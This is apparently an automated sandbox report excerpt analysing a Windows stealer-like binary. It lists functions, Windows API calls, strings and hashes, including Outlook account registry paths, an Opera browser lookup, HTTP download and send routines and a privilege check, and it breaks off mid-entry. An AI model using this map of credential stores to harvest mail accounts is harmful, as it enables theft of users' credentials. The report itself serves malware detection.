Instruction Fuzzy Hash: D1D118B0D042489EDF25CFA9C8857EEBBB8AF19304F10415FE496B7282D7785648CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004371FA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004371FF
GetTimeZoneInformation.KERNEL32(?,73B024D0,00000000), ref: 0043721C

Part of subcall function 00412BD9: __EH_prolog.LIBCMT ref: 00412BDE

Part of subcall function 00413337: __EH_prolog.LIBCMT ref: 0041333C
Part of subcall function 00413337: std::locale::_Init.LIBCPMT ref: 0041335A

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043736A

Strings

%A, xrefs: 004372BC
T, xrefs: 0043731F
9}<)g}, xrefs: 00437267, 004372AB, 0043726E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
String ID: 9}<)g}$T$%A
API String ID: 3259846166-174459869
Opcode ID: b3778d1821aca3890c57e4e293b17e6e05bbe9bc7304a9f8076132ac10da8c0c
Instruction ID: 162ebed1eb13c3b0278badf9aa4dc64885cc43935c5698f0d3ef241c67cc4b1f
Opcode Fuzzy Hash: b3778d1821aca3890c57e4e293b17e6e05bbe9bc7304a9f8076132ac10da8c0c
Instruction Fuzzy Hash: 3A418F71C04358CBDB15DFA9C944BEEBBB5AF49308F1081AED809B7241EB781A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00410648, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 611libraryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041064D

Part of subcall function 00411E16: __EH_prolog.LIBCMT ref: 00411E1B

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

LoadLibraryA.KERNEL32(00000000,?), ref: 00410699
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004106F5

Part of subcall function 0040BB39: __EH_prolog.LIBCMT ref: 0040BB3E
Part of subcall function 0040BB39: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
Part of subcall function 0040BB39: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

FreeLibrary.KERNEL32(00000000), ref: 00410E60

Strings

Opera, xrefs: 00410779

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcat
String ID: Opera
API String ID: 1239964785-505338728
Opcode ID: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
Instruction ID: ac1ca881525ca60fb4c11f72a3a0c97497af74f9ee91cf4d6f14cdaa43dc21d9
Opcode Fuzzy Hash: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
Instruction Fuzzy Hash: D8427D70D00258DFDF14DFA9C9457EEBBB1AF49308F1080AEE445B7281DB789A85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A224, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244
StrStrIW.SHLWAPI(?,0047C394), ref: 0042A295
CoTaskMemFree.OLE32(?), ref: 0042A2B3
CoTaskMemFree.OLE32(?), ref: 0042A2C1

Strings

(, xrefs: 0042A279

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
Instruction ID: 49c26595c2effa2261d274fccedc07f4d445ec10e3301bf20fc288ebb5b5a36d
Opcode Fuzzy Hash: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
Instruction Fuzzy Hash: 7021F974F00219EFDB04DFA5E884D9EB7B9EF48704B5480AAE805E7250DB75AD44CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF59, Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 959memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BF5E

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000030,00000012,0040CF41,?,?), ref: 0040CBE4
HeapFree.KERNEL32(00000000,?,?,?,?,00000030,00000012,0040CF41,?,?,?,?,?,?,?,?), ref: 0040CBEB

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

+, xrefs: 0040CED0

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologHeap$FreeProcess
String ID: +
API String ID: 2705843071-2126386893
Opcode ID: 2d538c1b0e30c72e98c484eec62a8657bd5a1e9e8a44bd9ae100a588f7064717
Instruction ID: 6f650102c44ed2988148468859b7f00f5fc0931f42b68e76572e5eacd64b4793
Opcode Fuzzy Hash: 2d538c1b0e30c72e98c484eec62a8657bd5a1e9e8a44bd9ae100a588f7064717
Instruction Fuzzy Hash: 50A2D230C042ACCAEB22CB64CD907EDBBB5AF55304F1492EAD48977192DB741BC9CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043EFDD, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000,0041444D,?), ref: 0043EFE9
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F019
GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F026
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F040
GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F04D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: f49c407236705bb1858e3742d2d01a67902bcda0663bbd1b4337ab0556099fd5
Instruction ID: 2e699ab520b179d43ad2bf4343934b09a901ed4888842c9946054f0494e0c7a6
Opcode Fuzzy Hash: f49c407236705bb1858e3742d2d01a67902bcda0663bbd1b4337ab0556099fd5
Instruction Fuzzy Hash: 3601B531900189BBCB301F66DC0CC5B3F79EFCA721F10453AF668851E1D7B19851DA69

Uniqueness

Uniqueness Score: -1.00%

Function 00446C01, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00457287,?,00446C00,00000000,?,00457287,00000000,00457287), ref: 00446C23
TerminateProcess.KERNEL32(00000000,?,00446C00,00000000,?,00457287,00000000,00457287), ref: 00446C2A
ExitProcess.KERNEL32 ref: 00446C3C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fd567d1d95fc0b1b2e0ab47bf8cb84df5a4e2946a63e4a6b2f4b1354005d26f9
Instruction ID: 83c662bb3abd2437a7950714daeb2dd464c2df181d476724e7f7802d14e6ca57
Opcode Fuzzy Hash: fd567d1d95fc0b1b2e0ab47bf8cb84df5a4e2946a63e4a6b2f4b1354005d26f9
Instruction Fuzzy Hash: 5CE08631910108AFCF116F55CD499493B69FF41341F014029F80486131DB79DDC2CB8F

Uniqueness

Uniqueness Score: -1.00%

Function 004344AA, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 276fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004344AF
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 004345DF

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00434639
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 004346B1
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 00434718
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434748
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00434754
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00434769
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00434794
WriteFile.KERNEL32(?,00000000,?,CECED245,00000000), ref: 004347A9
GetLastError.KERNEL32 ref: 004347C4
WinHttpCloseHandle.WINHTTP(00000000), ref: 004347CB
WinHttpCloseHandle.WINHTTP(00000000), ref: 004347D5
CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 004347DE
WinHttpCloseHandle.WINHTTP(?), ref: 004347E5

Strings

GET, xrefs: 004346AB, 00434712
%99[^:]://%99[^/]%99[^], xrefs: 00434537

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
String ID: %99[^:]://%99[^/]%99[^]$GET
API String ID: 4006077129-3478069819
Opcode ID: 902b6f2f81d9e23b1b5b7943883cf55fe279bbb251f4d8df439bd9c92ec6da98
Instruction ID: 7f1348a21265612ae21412d4864c76256cf8e41bc4be0fb22147dbfb47b544d7
Opcode Fuzzy Hash: 902b6f2f81d9e23b1b5b7943883cf55fe279bbb251f4d8df439bd9c92ec6da98
Instruction Fuzzy Hash: 2AA17F71D00259AFDB11DFA0CD85BEEB7B8FF49304F1040AAE405A7241EB789E45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004340AE, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 304COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004340B3
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047935B,00000000), ref: 00434101
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,?,?,?,0047935B,00000000), ref: 004341D0

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,?,?,?,0047935B,00000000), ref: 0043422D
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047935B,00000000), ref: 004342AF
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047935B,00000000), ref: 00434320
_strlen.LIBCMT ref: 0043434D
_strlen.LIBCMT ref: 00434357
WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047935B,00000000), ref: 0043436D
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 0043437E
WinHttpQueryDataAvailable.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 00434395
WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047935B,00000000), ref: 004343C0
GetLastError.KERNEL32(?,?,?,0047935B,00000000), ref: 00434478
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434482
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434489
WinHttpCloseHandle.WINHTTP(?,?,?,?,0047935B,00000000), ref: 00434493

Strings

Content-Type: text/plain; charset=UTF-8, xrefs: 00434367
%99[^:]://%99[^/]%99[^], xrefs: 00434127

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSend
String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
API String ID: 1550182571-3818427525
Opcode ID: 25297ec9ee6f455470686aef52f7db8a79fe0bd4b97b07facc02fedabffe4a29
Instruction ID: f6a42a86f5f42bcb76b4ddb13d4285eca02b7aca3b6ba09dba9197e53e9a81a6
Opcode Fuzzy Hash: 25297ec9ee6f455470686aef52f7db8a79fe0bd4b97b07facc02fedabffe4a29
Instruction Fuzzy Hash: E1C17E70D012199FDB14DFA5C985BEEBBB8EF09304F1040AEE805A7251DB789A84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00435346, Relevance: 28.6, APIs: 3, Strings: 16, Instructions: 102stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004349A2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
Part of subcall function 004349A2: GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
Part of subcall function 004349A2: FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54

Part of subcall function 00434E00: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
Part of subcall function 00434E00: RegEnumKeyExW.ADVAPI32 ref: 00434EB6
Part of subcall function 00434E00: RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3

Part of subcall function 00434ECD: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32 ref: 00434F1F
Part of subcall function 00434ECD: lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
Part of subcall function 00434ECD: lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
Part of subcall function 00434ECD: lstrcpyW.KERNEL32(00000000,0043549A), ref: 00434F64
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32 ref: 00434FC4
Part of subcall function 00434ECD: RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9

Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE

lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
lstrcpyW.KERNEL32(00000000,00000000), ref: 004353C0
lstrcpyW.KERNEL32(00000000,\Accounts), ref: 004353CC

Part of subcall function 00434E00: lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
Part of subcall function 00434E00: lstrcpyW.KERNEL32(00000000,0043549A), ref: 00434E68
Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,?), ref: 00434E82

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Strings

Identities, xrefs: 0043537A
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435364
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 0043540A
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004353ED
Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00435426
\Accounts, xrefs: 004353C6
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 0043545E
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 00435472
Software\Microsoft\Internet Account Manager, xrefs: 0043538E
Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00435418
Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 00435434
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00435442
Outlook, xrefs: 00435389
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 004353FF
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 00435450
\Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435370

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
API String ID: 527226083-92925148
Opcode ID: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
Instruction ID: 0d555bd477462e5ae5348e1b232b1991ce146c984576671113c76f2dd29a40c2
Opcode Fuzzy Hash: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
Instruction Fuzzy Hash: 27310BB1950208BED704EBE6DDD3DEE73ACEF58748F60545FF00521182ABBD2E059629

Uniqueness

Uniqueness Score: -1.00%

Function 004641EE, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00463EA7: CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4

GetLastError.KERNEL32 ref: 00464302
__dosmaperr.LIBCMT ref: 00464309
GetFileType.KERNEL32(00000000), ref: 00464315
GetLastError.KERNEL32 ref: 0046431F
__dosmaperr.LIBCMT ref: 00464328
CloseHandle.KERNEL32(00000000), ref: 00464348
CloseHandle.KERNEL32(0045A93D), ref: 00464495
GetLastError.KERNEL32 ref: 004644C7
__dosmaperr.LIBCMT ref: 004644CE

Strings

H, xrefs: 00464453

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
Instruction ID: 4268d31200a389006fd8fd956af786bf09120caabc753a0eab52de2409f61829
Opcode Fuzzy Hash: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
Instruction Fuzzy Hash: D5A11632A001549FDF19DF68DC517AE7BE1EF4A324F14015EF811AB392EB398912C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0042032E, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 188filetimeCOMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 004203EC
wsprintfA.USER32 ref: 00420446
wsprintfA.USER32 ref: 00420467
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00420496
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00420508
SetFileTime.KERNEL32(?,?,?,?), ref: 00420542
CloseHandle.KERNEL32(?), ref: 00420552

Strings

%s%s%s, xrefs: 00420440
:, xrefs: 00420420
%s%s, xrefs: 00420461

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
String ID: %s%s$%s%s%s$:
API String ID: 840165387-3034790606
Opcode ID: 8f069e8463c626be3a004baeee745c24c7feb58abd0316c5a27faf6da5075bfd
Instruction ID: e75abde7eae685be2b2f9ab9f80e574431accfd2092442307ffe520205e795b7
Opcode Fuzzy Hash: 8f069e8463c626be3a004baeee745c24c7feb58abd0316c5a27faf6da5075bfd
Instruction Fuzzy Hash: 08615A30700228AFDB20DF14E880BEA77E9AF04354F50446BE98597293D7789EC6CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00438DFD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
GetLastError.KERNEL32 ref: 00438E3A
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
GlobalFree.KERNEL32 ref: 00438E92

Strings

S-1-5-18, xrefs: 00438E7F

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
Instruction ID: 29b2e7db3b3389ff21f5b96232cbe853033b43f37d7ff0144f937ce0bd561e70
Opcode Fuzzy Hash: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
Instruction Fuzzy Hash: 94112E35E00214BBDB10ABA2DC09F9FBF78EF49755F104069F605E1060EBB89A05DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00434ECD, Relevance: 15.1, APIs: 10, Instructions: 102stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
RegEnumKeyExW.ADVAPI32 ref: 00434F1F
lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
lstrcpyW.KERNEL32(00000000,0043549A), ref: 00434F64
lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
RegEnumKeyExW.ADVAPI32 ref: 00434FC4
RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
String ID:
API String ID: 3646165539-0
Opcode ID: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
Instruction ID: 84fe12fb3e25c27bb54342457b29e1adbaab05e93512211763e3781aba143f04
Opcode Fuzzy Hash: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
Instruction Fuzzy Hash: B2314171E00109BBDB109B91DC88EEF7BBCEF89744F14406AF405E2210EBB8AE45DA65

Uniqueness

Uniqueness Score: -1.00%

Function 0045984D, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62e4a371ff78ce66a14b13467f2bb52594c41d0c2f3738d43913cd8d8563ab2
Instruction ID: 07b9d936a766d6b50e7dfe1019eefbb7ff4beb11db5ae68d8d4c2ca7d7772d3b
Opcode Fuzzy Hash: a62e4a371ff78ce66a14b13467f2bb52594c41d0c2f3738d43913cd8d8563ab2
Instruction Fuzzy Hash: ACC1DDB0A04245EFEB11CF99D880BAEBBB1FF49305F04405AE9409B393D739AD45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00416EAD, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 322COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416EB2

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

i`qv, xrefs: 0041723D
7>/(, xrefs: 004170DD
.*-$, xrefs: 00417139
Y, xrefs: 00417244
]s9<), xrefs: 0041722A
E@U, xrefs: 0041717D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: .*-$$7>/($E@U$Y$]s9<)$i`qv
API String ID: 2428181759-1285848389
Opcode ID: 08b693f4e23cbc1bc5cc0861f7330245b48294c026e92505b37ad92ce15d3455
Instruction ID: 5c09770262b4dee08a45ab733f9034201edc935d23fd1d9822186e371322f0ec
Opcode Fuzzy Hash: 08b693f4e23cbc1bc5cc0861f7330245b48294c026e92505b37ad92ce15d3455
Instruction Fuzzy Hash: BCD1F330D04259CACF15DFA5D991AEDBBB1AF19304F2041AFE40A77282DB385B89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0045590A, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

_free.LIBCMT ref: 00455A19
_free.LIBCMT ref: 00455A30
_free.LIBCMT ref: 00455A4D
_free.LIBCMT ref: 00455A68
_free.LIBCMT ref: 00455A7F

Strings

"PE, xrefs: 00455ABF, 00455913, 00455AD4

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: "PE
API String ID: 3033488037-2022024151
Opcode ID: 2bf5a1a01a9f0caeee1094deeb31f631af0a2d7b694dcdc29980c2dad6fdbdeb
Instruction ID: 3bf21ee709f1d0c6971ebfa2f6eddaeea25822bb4e084cf80399478981681b89
